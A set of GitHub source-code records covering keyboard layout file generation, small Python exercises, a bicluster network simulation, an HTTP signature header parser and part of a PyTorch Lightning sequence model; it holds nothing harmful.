f\"LOCALENAME\\t\\\"{'-'.join(locale_name.split('_'))}\\\"\\n\\nLOCALEID\\t\\\"0000{locale_id}\\\"\\n\\nVERSION\\t\"\\\n f\"1.0\\n\\nSHIFTSTATE\\n\\n0\\t//Column 4\\n1\\t//Column 5 : Shft\\n2\\t//Column 6 : Ctrl\\n\\nLAYOUT\\t\\t\"\\\n f\";an extra \\'@\\' at the end is a dead key\\n\\n//SC\\tVK_\\t\\tCap\\t0\\t1\\t2\\n//--\\t----\\t\\t----\\t----\" \\\n f\"\\t----\\t----\\n\\n\"\n\n kc_lines = []\n for row, sc_row in zip(*_make_rows_scs(keyboard, has_symbols)):\n for key, sc in zip(row, sc_row):\n kc_lines.append(_get_kc_line(key, sc))\n\n if type(keyboard) == IsoKeyboard:\n kc_lines.append(_get_kc_line(keyboard.iso_key, sc=\"iso_key\"))\n\n kc_lines.append(\"39\\tSPACE\\t0\\t0020\\t0020\\t0020\")\n kc_lines.append(\"53\\tDECIMAL\\t0\\t002e\\t002e\\t-1\")\n key_lines = '\\n'.join(kc_lines)\n\n desc_2 = f\"DESCRIPTIONS\\n\\n{locale_id}\\t{region}-{keyboard.description}\" \\\n f\"\\nLANGUAGENAMES\\n\\n{locale_id}\\t{language}\\nENDKBD\\n\"\n with open(f\"{directory}/{keyboard.name}.klc\", \"w\", encoding='utf-16') as new_klc_file:\n new_klc_file.write(description + key_lines + static_text + desc_2)\n\n\ndef kc_to_char(kc: str):\n if len(kc) == 1:\n return kc\n else:\n return chr(int(kc[0:4], 16))\n\n\ndef klc_to_keyboard(file_name: str, keyboard_type=Keyboard, directory=\"klc_files\"):\n assert keyboard_type == Keyboard or keyboard_type == AnsiKeyboard or keyboard_type == IsoKeyboard,\\\n \"keyboard_type should be a Keyboard object\"\n with open(f\"{directory}/{file_name.split('.')[0]}.klc\", 'r', encoding='utf-16') as klc_file:\n klc = klc_file.read()\n kc_pattern = re.compile(r'(\\d.)\\t.+\\t\\d\\t(.{4,5}|.)\\t')\n keyboard_data = {\"nums\": ['*'] * 10,\n \"top_row\": ['*'] * 10,\n \"homerow\": ['*'] * 10,\n \"bot_row\": ['*'] * 10,\n \"symbols\": ['*'] * 7,\n \"iso_key\": '*'}\n for kc_data in re.findall(kc_pattern, klc):\n sc, key = kc_data\n try:\n row_destination, key_nr_destination = SC_REVERSE[sc]\n keyboard_data[row_destination][key_nr_destination] = kc_to_char(key)\n except ValueError:\n keyboard_data[\"iso_key\"] = kc_to_char(key)\n except KeyError:\n pass\n\n name, description = re.compile(r'KBD\\t(.+)\\t\"(.+)\"').findall(klc)[0]\n\n if keyboard_type == Keyboard:\n return Keyboard(keyboard_data['top_row'], keyboard_data['homerow'],\n keyboard_data['bot_row'], name, description)\n 
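# the richer keyboard types below also restore the parsed number row, symbols and (for ISO layouts) the extra iso key\n 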
elif keyboard_type == AnsiKeyboard:\n return AnsiKeyboard(keyboard_data['top_row'], keyboard_data['homerow'], keyboard_data['bot_row'],\n name, description, keyboard_data['symbols'], keyboard_data['nums'])\n else:\n return IsoKeyboard(keyboard_data['top_row'], keyboard_data['homerow'], keyboard_data['bot_row'], name,\n description, keyboard_data['symbols'], keyboard_data['nums'], keyboard_data['iso_key'])\n","repo_name":"O-X-E-Y/create_layout_files","sub_path":"klc_ext.py","file_name":"klc_ext.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"}
{"seq_id":"28863592959","text":"# Write a function that takes two numbers as parameters\n# Return a list of the n smallest even integers greater than start, in ascending order.\n\ndef get_even_integers(start, n):\n count = 0\n even_integer_list = []\n\n while count < n:\n if start % 2 == 0: # start is even: the next even integer is start + 2\n start += 2\n count += 1\n even_integer_list.append(start)\n else: # start is odd: the next even integer is start + 1\n start += 1\n count += 1\n even_integer_list.append(start)\n return even_integer_list # make sure to return\n\n\nprint(get_even_integers(2, 10))\n\n\n","repo_name":"k-charette/cloud-devops-2020","sub_path":"Week4/intro-to-python/functions/get_even_intergers.py","file_name":"get_even_intergers.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"7372545430","text":"from __future__ import print_function\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport sys,os\nimport random\nimport copy\nimport time\nimport warnings\nfrom fisher import pvalue\n\n\nfrom desmond_io import print_network_stats\n\ndef make_bg_matrix(n_genes,n_pats):\n # generates a background matrix of shape (n_genes, n_pats) filled with standard-normal noise\n df = {}\n for g in range(0,n_genes):\n df[g] = np.random.normal(loc=0,scale=1.0,size = n_pats)\n df = pd.DataFrame.from_dict(df).T\n return df\n\n\ndef implant_biclusters(df,genes_per_bic=5,pats_per_bic=10,max_n_bics=1,bic_median=1.0,\n outdir = \"./\",filename=\"implanted_bic\", g_overlap=False,p_overlap=True):\n bic_g = []\n bic_p = []\n bg_g = set(df.index.values).difference(set(bic_g))\n bg_p = set(df.columns.values).difference(set(bic_p))\n if g_overlap == False:\n if p_overlap== False:\n n_bics = min(len(bg_g)/genes_per_bic,len(bg_p)/pats_per_bic,max_n_bics)\n fname_ext = \".overlap=FF\"\n bicluster_kind = \"with no overlap\"\n else:\n n_bics = min(len(bg_g)/genes_per_bic,max_n_bics)\n fname_ext = \".overlap=FT\"\n bicluster_kind = \"with sample overlap\"\n else:\n if p_overlap== False:\n n_bics = min(len(bg_p)/pats_per_bic,max_n_bics)\n fname_ext = \".overlap=TF\"\n bicluster_kind = \"with gene overlap\"\n else:\n n_bics =max_n_bics\n fname_ext = \".overlap=TT\"\n bicluster_kind = \"gene and sample overlap\"\n \n if n_bics != max_n_bics:\n print(\"Will create %s biclusters with %s instead of %s\"%(n_bics, bicluster_kind, max_n_bics),file=sys.stderr)\n else:\n print(\"Will create %s biclusters with %s \"%(n_bics,bicluster_kind),file=sys.stderr)\n \n biclusters = []\n\n # make samples annotation table\n anno = pd.DataFrame(index=map(lambda x : 
\"bic\"+str(x),range(0,n_bics)),\n columns=df.columns.values,data=0).T\n anno.index.name = \"samples2biclusters\"\n # make samples annotation table\n anno_g = pd.DataFrame(index=map(lambda x : \"bic\"+str(x),range(0,n_bics)),\n columns=df.index.values,data=0).T\n anno_g.index.name = \"genes2biclusters\"\n\n\n for bc in range(0,n_bics):\n # select random sets of samples and genes from the background\n genes = list(np.random.choice(list(bg_g),size=genes_per_bic,replace=False))\n pats = list(np.random.choice(list(bg_p),size=pats_per_bic,replace=False))\n biclusters.append({\"genes\":genes, \"samples\":pats})\n bic_g+=genes\n bic_p+=pats\n # identify samples outside the bicluster\n if not g_overlap:\n bg_g = bg_g.difference(set(bic_g))\n if not p_overlap:\n bg_p = bg_p.difference(set(bic_p))\n # generate bicluster\n df_bic = {}\n for g in genes:\n df_bic[g] = dict(zip(pats,np.random.normal(loc=bic_median,\n scale=1.0,size = pats_per_bic)))\n df_bic = pd.DataFrame.from_dict(df_bic).T \n\n #implant the bicluster\n df.loc[genes,pats] = df_bic\n df.index.name = \"genes_samples\"\n\n # add record to annotation\n anno.loc[pats,\"bic\"+str(bc)] = 1\n anno_g.loc[genes,\"bic\"+str(bc)] = 1\n if filename:\n filename = filename+\".N=\"+str(int(n_bics))+\".Mu=\"+str(bic_median)+\".GxP=\"+str(genes_per_bic)+\",\"+str(pats_per_bic)+fname_ext\n df.to_csv(outdir+\"/exprs/\"+filename+\".exprs.tsv\",sep = \"\\t\")\n # annotated df\n anno_g = anno_g.sort_values(by=list(anno_g.columns.values),ascending = False)\n anno = anno.sort_values(by=list(anno.columns.values),ascending = False)\n anno = anno.T\n df_anno = df.loc[anno_g.index.values, anno.columns.values]\n df_anno = pd.concat([anno_g,df_anno],axis =1)\n df_anno = pd.concat([anno,df_anno])\n df_anno = df_anno.loc[:,list(anno_g.columns.values)+list(anno.columns.values)]\n df_anno.to_csv(outdir+\"/exprs_annotated/\"+filename+\".exprs_annotated.tsv\",sep = \"\\t\")\n fopen = open(outdir+\"/true_biclusters/\"+filename+\".biclusters.txt\",\"w\")\n i=0\n for bic in biclusters:\n print(\"id:\\t\"+str(i),file=fopen)\n print(\"genes:\\t\"+\" \".join(map(str,bic[\"genes\"])),file=fopen)\n print(\"samples:\\t\"+\" \".join(map(str,bic[\"samples\"])),file=fopen)\n i+=1\n fopen.close()\n return df, biclusters,anno_g,filename\n\ndef simulate_network(n_genes, beta, delta,verbose = True):\n # makes scale-free networks\n t_0 = time.time()\n alpha = (1.0-beta)/2\n gamma = (1.0-beta)/2\n n_neigh =[]\n G = nx.scale_free_graph(n_genes,alpha=alpha,beta=beta,\n gamma=gamma,delta_in=delta, delta_out=delta)\n if verbose:\n print(\"\\tgamma:\",1+(1.0+delta*(alpha+gamma))/(alpha+beta))\n # convert to undirected, with no self-loops or duplicated edges\n G = G.to_undirected()\n G.remove_edges_from(G.selfloop_edges())\n G = nx.Graph(G)\n # node degree distribution\n for n in G.nodes():\n n_neigh.append(len(G[n].keys()))\n tmp = plt.hist(n_neigh,range=(1,100),bins=50, density=True)\n plt.show()\n if verbose:\n print_network_stats(G)\n print(\"\\tmin and max node degree: %s,%s\"%(max(n_neigh), min(n_neigh)))\n print(\"runtime:\",round(time.time()-t_0,2),\"s\",file = sys.stderr)\n return G\n\n\ndef group_genes(anno,verbose = True):\n # group genes together if they are asssigned to the same bicluster(s), e.g. all in 1 or all in 1,2,3 ... 
\n colnames = list(anno.columns.values)\n anno[\"sum\"] = anno.apply(sum,axis =1) # this is for sorting only\n anno.sort_values([\"sum\"]+colnames,ascending=False,inplace=True)\n anno = anno.loc[:,colnames]\n grouped = anno.groupby(colnames) # groupby by all columns\n max_bics_per_gene = 0\n gene_groups = []\n\n for name, group in grouped:\n #print(name,sum(name), len(group.index.values))\n max_bics_per_gene = max(max_bics_per_gene,sum(name))\n bics= []\n for i in range(0,len(name)):\n if name[i] == 1:\n bics.append(i)\n gene_groups.append({\"genes\":list(group.index.values),\"bics\":bics})\n if verbose:\n print(\"\\tMax. number of biclusters per gene:\",max_bics_per_gene)\n print(\"\\tUnique gene groups\",len(gene_groups))\n return gene_groups, max_bics_per_gene, anno \n\ndef find_starting_points(G,bics,m=1,verbose = True):\n ''' identifies bics already assigned to G \n \\n\\t m is multiplicator for selecting nodes with degree m times higher than the number of biclusters\n \\n returns 1) a list of starting nodes 2) whether these nodes unlabelled'''\n \n min_n_neigh = len(bics)\n consider_bics = set()\n for n,data in G.nodes(data=True):\n for bc in data['bics']:\n if bc in bics:\n consider_bics.add(bc)\n # identify seeds - nodes which neighbours already assigned to a bicluster\n if len(consider_bics) == 0:\n # if nothing to consider, add all empty nodes to starting points \n starting_nodes = [node for node in G.nodes() if (len(G.node[node]['bics']) == 0 and unassigned_order(node, G) > min_n_neigh*m)]\n if verbose:\n print(\"\\twill consider no biclusters; de novo strating nodes identified\",len(starting_nodes))\n return starting_nodes, True\n else:\n if verbose:\n print(\"\\twill consider biclusters\",consider_bics,\"previously added to the Graph\")\n consider_bics = list(consider_bics)\n starting_nodes = []\n for n in G.nodes():\n if len(G.node[n]['bics'])==0:\n bics_ = copy.copy(consider_bics)\n for neigh in G[n].keys():\n assigned_bics = G.node[neigh][\"bics\"]\n for bic in assigned_bics:\n if bic in bics_:\n bics_.remove(bic)\n if len(bics_)==0:\n # if all bics contacted by node n, add to starting points\n starting_nodes.append(n)\n break\n if len(starting_nodes) == 0:\n if verbose:\n print(\"Fails to identify any valid starting node. 
Try increasing m.\", file = sys.stderr)\n return [], False\n else:\n if verbose:\n print(\"Valid starting nodes identified\",len(starting_nodes)) \n return starting_nodes, False\n\ndef unassigned_order(node, G):\n '''Counts the number of unlabelled neighbours for a node in G'''\n order = 0 \n for node2 in G[node].keys(): \n if len(G.node[node2]['bics']) == 0:\n order +=1\n return order \n\ndef DIAMOnD(n, G, CC, required_len):\n '''Implements the method from https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1004120'''\n if len(CC)< required_len:\n s0 = len(CC)\n N = 2000\n best_pval,best_candidate = 1.0,-1\n for n_ in CC:\n for n2 in G[n_].keys():\n if len(G.node[n2]['bics']) == 0 and n2 not in CC:\n n2_neigh = G[n2].keys()\n ks = len([x for x in n2_neigh if x in CC])# how many neighbours in CC\n k_bg = len(n2_neigh) - ks\n p_val = pvalue(ks,k_bg,s0,N).right_tail\n if p_val < best_pval:\n best_pval = p_val\n best_candidate = n2\n CC.append(best_candidate)\n if len(CC)< required_len:\n CC=DIAMOnD(n, G, CC, required_len)\n return CC\n\ndef DFS(n, G, CC, required_len):\n '''Depth-first search'''\n for n2 in G[n].keys():\n if len(G.node[n2]['bics']) == 0 and n2 not in CC:\n if len(CC) < required_len:\n CC.append(n2)\n CC = DFS(n2, G, CC, required_len)\n else:\n return CC\n return CC\n\ndef BFS(n, G, CC, required_len):\n '''Breadth-first search (expands one ring of neighbours, then continues depth-first from each of them)'''\n neighbours = []\n for n2 in G[n].keys():\n if len(G.node[n2]['bics']) == 0 and n2 not in CC:\n if len(CC) < required_len:\n neighbours.append(n2)\n CC.append(n2)\n else:\n return CC\n for n2 in neighbours:\n if len(CC) < required_len:\n CC = DFS(n2, G, CC, required_len)\n else:\n return CC\n return CC\n\ndef assign_nodes(G,genes, bics,method=\"DFS\", verbose = True):\n '''Assigns genes to G network nodes given gene-bicluster membership.\n Takes into account biclusters already mapped to the network. '''\n min_n_neigh = len(bics)\n mapped_genes = {}\n already_mapped = []\n if method == \"DFS\":\n func = DFS\n elif method == \"BFS\":\n func = BFS\n elif method == \"DIAMOnD\":\n func = DIAMOnD\n else:\n print(\"Wrong method name\", method,file= sys.stderr)\n return None, {}\n \n # identifies seed nodes - which already assigned to a bicluster - or picks random unlabelled nodes\n starting_nodes, are_new = find_starting_points(G,bics,m=1,verbose = verbose)\n G_ = G.copy() \n genes_ = copy.copy(genes)\n \n required_len = len(genes_)\n \n random.shuffle(starting_nodes)\n #if not are_new: # \n if verbose:\n print(\"\\tGrow CC\", bics, \"from any of\",len(starting_nodes),\"nodes for\", len(genes_),\"genes.\")\n for starting_node in starting_nodes:\n if are_new: # if new CC initialized, map starting node to a gene\n CC = [starting_node]\n else:\n CC = []\n required_len = len(genes_)\n CC = func(starting_node, G_, CC, required_len)\n # map genes\n for n in CC:\n g = genes_.pop()\n mapped_genes[n] = g\n G_.node[n]['bics'] = bics\n if len(genes_) == 0:\n return G_, mapped_genes\n else:\n if verbose:\n print(\"\\t\\tgenes remaining unassigned\",len(genes_))\n print(\"\\tFailed: grew CC of\",len(CC),\"nodes, but\",len(genes_),\"genes remain unassigned\",file=sys.stderr )\n return None, {}\n \n\ndef grow_independent_subnetworks(G,gene_groups,max_bics_per_gene, method=\"DFS\", verbose=True):\n mapping= {}\n for gene_group in gene_groups:\n bics = gene_group['bics']\n if len(bics) == 1:\n genes = copy.copy(gene_group['genes'])\n if verbose:\n print(\"Assign nodes for\",len(genes),\"gene(s) from\", bics,\"using\", method)\n G, mapped_genes = assign_nodes(G,genes, bics, method=method,verbose = verbose)\n if len(mapped_genes.keys())>0:\n mapping.update(mapped_genes)\n else:\n if verbose:\n print(\"Failed mapping for \",len(genes),\"gene(s) from\", bics, file = sys.stderr)\n return None, {}\n return G, mapping\n \n\ndef add_shared_nodes(G,gene_groups,max_bics_per_gene, mapping, verbose=True):\n # add shared nodes, starting from nodes assigned to many biclusters\n for s in range(max_bics_per_gene,1,-1):\n for gene_group in gene_groups:\n bics = gene_group['bics']\n genes = copy.copy(gene_group['genes'])\n if len(bics) == s:\n if verbose:\n print(\"Assign nodes for\",len(genes),\"gene(s) from\", bics)\n starting_nodes, are_new = find_starting_points(G,bics,m=1,verbose = verbose)\n n_genes = len(genes)\n if len(starting_nodes) >= n_genes:\n nodes = random.sample(starting_nodes,n_genes)\n for i in range(0,n_genes): # not necessarily directly connected\n # update mapping and G\n mapping[nodes[i]]=genes[i]\n G.node[nodes[i]]['bics'] = bics\n print(\"Success for\",len(genes),\"gene(s) from\", bics)\n else:\n print(\"Failed for \",len(genes),\"gene(s) from\", bics,\".No free candidate nodes connecting subnetworks available.\", file = sys.stderr)\n return False, None\n \n assigned_nodes = [node for node in G.nodes() if len(G.node[node]['bics']) != 0]\n print(\"All genes from biclusters mapped:\", set(assigned_nodes)== set( mapping.keys()))\n # add background genes:\n unassigned_nodes = [node for node in G.nodes() if len(G.node[node]['bics']) == 0]\n \n if verbose:\n print(\"Background nodes\",len(unassigned_nodes))\n for gene_group in gene_groups:\n bics = gene_group['bics']\n genes = gene_group['genes']\n if len(bics) == 0:\n unassigned_genes = genes\n print(\"Unmapped genes:\", len(unassigned_genes))\n mapping.update(dict(zip(unassigned_nodes,unassigned_genes)))\n if verbose:\n print(\"All nodes 
mapped:\",set(mapping.keys())==set(G.nodes()), file = sys.stderr)\n # relabel nodes\n G = nx.relabel_nodes(G,mapping=mapping)\n \n return True, G\n\ndef mapp_all_nodes(G,gene_groups,max_bics_per_gene, method=\"DFS\", verbose=True):\n G_ = G.copy()\n nx.set_node_attributes(G_,'bics',[])\n nx.set_node_attributes(G_,'gene',[])\n # first create independent networks\n print(\"Grow independent networks \")\n G_, mapping = grow_independent_subnetworks(G_,gene_groups,max_bics_per_gene, method=method, verbose=verbose)\n if len(mapping)>0:\n print(\"\\tAdd shared genes\")\n # then select nodes connecting independent subnetworks and label with shared genes\n passed, G_ = add_shared_nodes(G_,gene_groups,max_bics_per_gene,mapping, verbose=verbose)\n if passed:\n return G_\n else:\n print(\"\\t...failed assigning shared genes\")\n else:\n print(\"\\t...failed growing independent subnetworks\")\n\n\ndef check_connectivity(G, anno,verbose = True, plot = False):\n # checks whether genes from bicluster form a connected component\n all_connected = True\n for bc in range(0,anno.shape[1]):\n nodes_in_bic = []\n for n,data in G.nodes(data=True):\n if bc in data['bics']:\n nodes_in_bic.append(n)\n subnet = G.subgraph(nodes_in_bic)\n if len([x for x in nx.connected_components(subnet)])>1:\n all_connected = False\n print(\"Subnetwork\",bc, \"is not connected.\", file = sys.stderr)\n if plot:\n pos = nx.spring_layout(subnet , iterations=1000)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n nx.draw(subnet ,pos=pos, with_labels=True, font_weight='bold')\n plt.show()\n if verbose:\n print_network_stats(subnet)\n return all_connected","repo_name":"ozolotareva/DESMOND","sub_path":"DESMOND_py2/simulations.py","file_name":"simulations.py","file_ext":"py","file_size_in_byte":16696,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"6096361007","text":"def checkExeption(arr, k):\n try:\n for i in range(len(arr)):\n a = int(arr[i])\n except ValueError:\n print(\"[-] Error, array contains different types\")\n exit()\n if len(arr) == 0:\n print(\"[-] Error, array is empty\")\n exit()\n if len(arr) == 1:\n return arr[0]\n if len(arr) < k:\n print(\"[-] Error, k is greater than the length of the array\")\n exit()\n\n\ndef sepList(arr, left, right, q):\n p = arr[q]\n arr[q], arr[right] = arr[right], arr[q]\n i = left\n for j in range(left, right):\n if arr[j] <= p:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i], arr[right] = arr[right], arr[i]\n return i\n\n\ndef k_min(arr, k):\n left = 0\n right = len(arr) - 1\n if left == right:\n return arr[left]\n q = sepList(arr, left, right, (left + right) // 2)\n if q == k:\n return arr[q]\n if k < q:\n return k_min(arr[:q], k)\n elif k > q:\n return k_min(arr[q + 1:], k - q - 1)\n\n\nif __name__ == '__main__':\n search_sequence = [10, True, 0, 2, 9]\n print(\"Enter k:\")\n try:\n k = int(input())\n except ValueError:\n print(\"[-] Error, k1 is not an integer or empty\")\n exit()\n\n print(f\"[+] Search sequence: {search_sequence}\")\n print(f\"[+] k: {k}\")\n checkExeption(search_sequence, k)\n print(\"[+] Searching...\")\n print(f\"[+] Result: {k_min(search_sequence, k - 1)}\")","repo_name":"andrey1pf/Python","sub_path":"Task5/Task05/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"6016414378","text":"from functools import cache\n\n\nnum = int(input())\n\n\ndef 
fibonachi(n):\n if n < 1:\n return\n x, y = 0, 1\n print(x)\n # print the first n Fibonacci numbers iteratively\n for i in range(n - 1):\n x, y = y, x + y\n print(x)\n\n\nfibonachi(num)\n# @cache\n# def fibonacci(n):\n# if n in (1, 2):\n# return 1\n# return fibonacci(n - 1) + fibonacci(n - 2)\n#\n#\n# print(fibonacci(500))","repo_name":"Pandemic616/tasks","sub_path":"fibonachi.py","file_name":"fibonachi.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"}
{"seq_id":"36946878945","text":"import logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Signature:\n def __init__(self, key_id, algorithm, headers, signature):\n self.key_id = key_id\n self.algorithm = algorithm\n self.headers = headers\n self.signature = signature\n\n if self.algorithm not in [\"rsa-sha256\", \"hs2019\"]:\n logger.error(f\"Unsupported algorithm {self.algorithm}\")\n logger.error(self.signature)\n logger.error(self.headers)\n logger.error(self.key_id)\n\n raise Exception(f\"Unsupported algorithm {self.algorithm}\")\n\n def fields(self):\n return self.headers.split(\" \")\n\n @staticmethod\n def from_signature_header(header):\n try:\n headers = header.split(\",\")\n headers = [x.split('=\"', 1) for x in headers]\n parsed = {x[0]: x[1].replace('\"', \"\") for x in headers}\n\n return Signature(\n parsed[\"keyId\"],\n parsed.get(\"algorithm\", \"rsa-sha256\"),\n parsed[\"headers\"],\n parsed[\"signature\"],\n )\n except Exception:\n logger.error(f\"failed to parse signature {header}\")\n\n\ndef parse_signature_header(header):\n return Signature.from_signature_header(header)\n","repo_name":"HelgeKrueger/bovine","sub_path":"bovine/bovine/utils/signature_parser.py","file_name":"signature_parser.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"29"}
{"seq_id":"44290299113","text":"import copy\nfrom typing import Optional, Tuple\nimport math\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport sklearn.metrics # the metrics submodule must be imported explicitly; plain 'import sklearn' leaves sklearn.metrics unavailable\nimport torch\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\n\nclass LitSeqModel(pl.LightningModule):\n def __init__(self, feature_names, regression, steps_per_epoch, pos_frac,\n max_epochs=5, weight_decay=0.1, use_macro_loss=True, \n use_pos_weight=True, use_nan_embed=False, lr=0.001, use_huber=False,\n use_static=True, freeze_nan_embed=False, norm_nan_embed=False, \n nan_embed_size=512, use_nan_embed_transformer=False, \n nan_embed_transformer_n_layers=3, \n nan_embed_transformer_n_heads=8, dropout=0.2, low_mem_mode=False):\n super().__init__() \n self.regression = regression\n self.use_macro_loss = use_macro_loss\n self.use_nan_embed = use_nan_embed\n self.lr = lr\n self.use_huber = use_huber\n self.use_static = use_static\n self.freeze_nan_embed = freeze_nan_embed\n self.nan_embed_size = nan_embed_size\n self.norm_nan_embed = norm_nan_embed\n self.dropout = dropout\n \n if use_static:\n # save the indices of static features so the model can run separate static/recurrent streams\n static_names = ['Geschlecht', 'Alter', 'Größe', 'Gewicht']\n static_idcs = [i for i, name in enumerate(feature_names)\n if name in static_names\n or name.startswith(\"Diagnose\")\n or name.startswith(\"DB_\")]\n non_static_idcs = [i for i in range(len(feature_names)) if i not in static_idcs]\n self.register_buffer(\"static_idcs\", torch.tensor(static_idcs))\n self.register_buffer(\"recurrent_idcs\", torch.tensor(non_static_idcs))\n 
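# buffers (not parameters): these index tensors follow .to(device) and are saved in state_dict without being trained\n 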
self.num_recurrent_inputs = len(self.recurrent_idcs)\n self.num_static_inputs = len(self.static_idcs)\n else:\n self.num_recurrent_inputs = len(feature_names)\n self.num_static_inputs = 0\n self.static_idcs = None\n self.recurrent_idcs = list(range(len(feature_names)))\n self.num_inputs = len(feature_names)\n \n # define loss \n self.pos_weight = (1 - pos_frac) / pos_frac if use_pos_weight else None\n self.loss_func = SequentialLoss(self.regression, self.use_macro_loss, self.pos_weight, self.use_huber)\n \n if self.use_nan_embed:\n from icp_pred.nan_emb import NanEmbed, NanEmbedTransformer\n emb_size = self.nan_embed_size\n if use_nan_embed_transformer:\n self.embed = NanEmbedTransformer(self.num_inputs, emb_size, low_mem_mode,\n n_layers=nan_embed_transformer_n_layers, n_heads=nan_embed_transformer_n_heads, dropout=self.dropout)\n else:\n self.embed = NanEmbed(self.num_inputs, emb_size, low_mem_mode)\n\n if self.freeze_nan_embed:\n for p in self.embed.parameters():\n p.requires_grad = False\n\n if self.norm_nan_embed:\n self.embed = torch.nn.Sequential(self.embed, torch.nn.LayerNorm(emb_size))\n \n self.num_recurrent_inputs = emb_size\n self.num_static_inputs = 0\n self.static_idcs = None\n self.recurrent_idcs = torch.tensor(list(range(emb_size)))\n \n \n self._average_model = None\n \n self.max_epochs = max_epochs\n self.steps_per_epoch = steps_per_epoch\n self.weight_decay = weight_decay\n \n def forward(self, x, *args, **kwargs):\n if self.use_nan_embed:\n x = self.embed(x)\n #x_emb = self.embed(x.reshape(-1, x.shape[-1]))#[:, 0])\n #x = x_emb.reshape(*x.shape[:-1], x_emb.shape[-1])\n preds = self.make_preds(x, *args, **kwargs)\n\n return preds\n \n def predict(self, x, *args, **kwargs):\n preds = self.forward(x, *args, **kwargs)\n if not self.regression:\n preds = torch.sigmoid(preds)\n return preds\n # custom methods\n\n # PT-lightning methods\n def training_step(self, batch, batch_idx):\n hiddens = None\n inputs, targets, lens = batch\n loss, preds = self.calc_loss(inputs, targets, hiddens, lens=lens)\n self.log(\"train_loss\", loss, on_step=True, on_epoch=False, prog_bar=False, logger=True)\n lr = self.scheduler.get_last_lr()[0]\n self.log('lr', lr, on_epoch=False, on_step=True, prog_bar=False, logger=True)\n return loss\n #return {\"loss\": loss}#, \"hiddens\": self.hiddens}\n \n def validation_step(self, batch, batch_idx):\n inputs, targets, lens = batch\n loss, preds = self.calc_loss(inputs, targets, lens=lens)\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True, prog_bar=True, logger=True)\n return copy.deepcopy(preds.detach().cpu()), copy.deepcopy(targets.detach().cpu())\n \n def validation_epoch_end(self, val_step_output_list):\n # calculate f1_score, accuracy etc\n preds = torch.cat([step_out[0].flatten() for step_out in val_step_output_list]).cpu().squeeze().float().numpy()\n targets = torch.cat([step_out[1].flatten() for step_out in val_step_output_list]).cpu().squeeze().float().numpy()\n # remove NaNs\n mask = ~np.isnan(targets)\n preds = preds[mask]\n targets = targets[mask]\n \n if self.regression:\n try:\n r2 = sklearn.metrics.r2_score(targets, preds)\n mse = sklearn.metrics.mean_squared_error(targets, preds)\n rmse = np.sqrt(mse)\n mae = sklearn.metrics.mean_absolute_error(targets, preds)\n except ValueError:\n print(\"ValueError: NaNs or Infs in targets or predictions\")\n print(targets.shape, preds.shape)\n print(\"Inf target preds:\", np.isinf(targets).sum(), np.isinf(preds).sum())\n print(\"Nan target preds: \", np.isnan(targets).sum(), 
np.isnan(preds).sum())\n print(targets, preds)\n # to stop training, raise a KeyboardInterrupt\n raise KeyboardInterrupt\n self.log(\"val_r2\", r2, on_epoch=True, prog_bar=True)\n self.log(\"val_mse\", mse, on_epoch=True, prog_bar=True)\n self.log(\"val_rmse\", rmse, on_epoch=True, prog_bar=True)\n self.log(\"val_mae\", mae, on_epoch=True, prog_bar=True)\n \n else:\n #print(targets.min(), targets.max())\n \n targets = targets.astype(int)\n #print(preds.min(), preds.max())\n #print(targets.min(), targets.max())\n # average precision\n ap = sklearn.metrics.average_precision_score(targets, preds, average=\"macro\", pos_label=1)\n self.log('val_ap', ap, on_epoch=True, prog_bar=False)\n # auc - per class and macro-averaged\n #print(\"Shapes: \", targets.shape, preds.shape)\n auc_micro = sklearn.metrics.roc_auc_score(targets, preds, average=\"micro\")\n #auc_macro = sklearn.metrics.roc_auc_score(targets, preds, average=\"macro\")\n #self.log('val_auc_macro', auc_macro, on_epoch=True, prog_bar=True)\n self.log('val_auc_micro', auc_micro, on_epoch=True, prog_bar=True)\n\n # metrics based on binary predictions\n binary_preds = (preds > 0.5).astype(int)\n self.log(\"val_acc_micro\", sklearn.metrics.accuracy_score(targets.reshape(-1), binary_preds.reshape(-1)), on_epoch=True)\n #macro_acc = (targets == binary_preds).astype(float).mean(axis=0).mean()\n #self.log(\"val_acc_macro\", macro_acc, on_epoch=True)\n #self.log(\"val_f1_macro\", sklearn.metrics.f1_score(targets, binary_preds, average=\"macro\"), on_epoch=True, logger=True)\n self.log(\"val_f1_micro\", sklearn.metrics.f1_score(targets, binary_preds, average=\"micro\"), on_epoch=True, logger=True)\n\n # log diagnostics of output distribution\n preds_for_pos = preds[targets == 1]\n preds_for_neg = preds[targets == 0]\n pos_mean = preds_for_pos.mean()\n neg_mean = preds_for_neg.mean()\n self.log(\"debug/pos_preds_mean\", pos_mean, on_epoch=True)\n self.log(\"debug/pos_preds_std\", preds_for_pos.std(), on_epoch=True)\n self.log(\"debug/neg_preds_mean\", neg_mean, on_epoch=True)\n self.log(\"debug/neg_preds_std\", preds_for_neg.std(), on_epoch=True)\n self.log(\"debug/preds_mean\", preds.mean(), on_epoch=True)\n self.log(\"debug/preds_std\", preds.std(), on_epoch=True)\n self.log(\"debug/preds_mean_diff\", pos_mean - neg_mean, on_epoch=True)\n \n\n def configure_optimizers_old(self):\n optimizer = torch.optim.AdamW(self.parameters(), lr=self.lr, weight_decay=0.1)\n #scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=0.98)\n return [optimizer]#, [scheduler]\n \n def configure_optimizers(self):\n optimizer = 